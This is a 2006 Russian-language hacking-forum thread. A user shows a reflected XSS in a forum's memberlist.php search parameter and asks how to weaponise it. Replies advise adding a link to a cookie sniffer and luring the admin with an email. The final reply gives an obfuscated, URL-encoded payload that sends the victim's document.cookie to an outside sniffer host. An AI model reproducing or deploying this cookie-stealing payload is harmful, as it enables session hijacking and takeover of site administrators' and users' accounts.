Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос по использованию пассивной Xss (https://forum.antichat.xyz/showthread.php?t=21465)

add 07.07.2006 23:11
Вопрос по использованию пассивной Xss
 
народ помогите пожалуйсто вот чё я нагрёб:
memberlist.php?what=%22%3E%3Cscript%3Ealert%28%27X SS%27%29%3C%2Fscript%3E%3C%22&perpage=10
как мне составить боевую XSS и куда впихнуть будучи поставленную XSS
Зарание блогодарен!

m2infect 08.07.2006 01:20
Цитата:
Сообщение от add
народ помогите пожалуйсто вот чё я нагрёб:
memberlist.php?what=%22%3E%3Cscript%3Ealert%28%27X SS%27%29%3C%2Fscript%3E%3C%22&perpage=10
как мне составить боевую XSS и куда впихнуть будучи поставленную XSS
Зарание блогодарен!
Ты получил сессию. А а тебе нужен кук. Тебе надо довабить скрип, где указан линк на сниф + кук. Спмотри описание снифера, там есть пример.
Удачи!
Если что, то пиши в ПМ.

Sn@k3 08.07.2006 02:06
это обыный алерт, а чтобы плюшку дёрнуть надо сначало узнать версию форума), после кидаешь письмо админу со снифером,крч понял, не буду объяснять дофига такого на АЧАТе, поиск рулит

Romaxa55 08.07.2006 03:14
Попробуй такой запрос:

Код:
memberlist.php?what=%22%3E%3Cscript%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B9%3C%2Fscript%3E%3C%22&perpage=10


Время: 03:19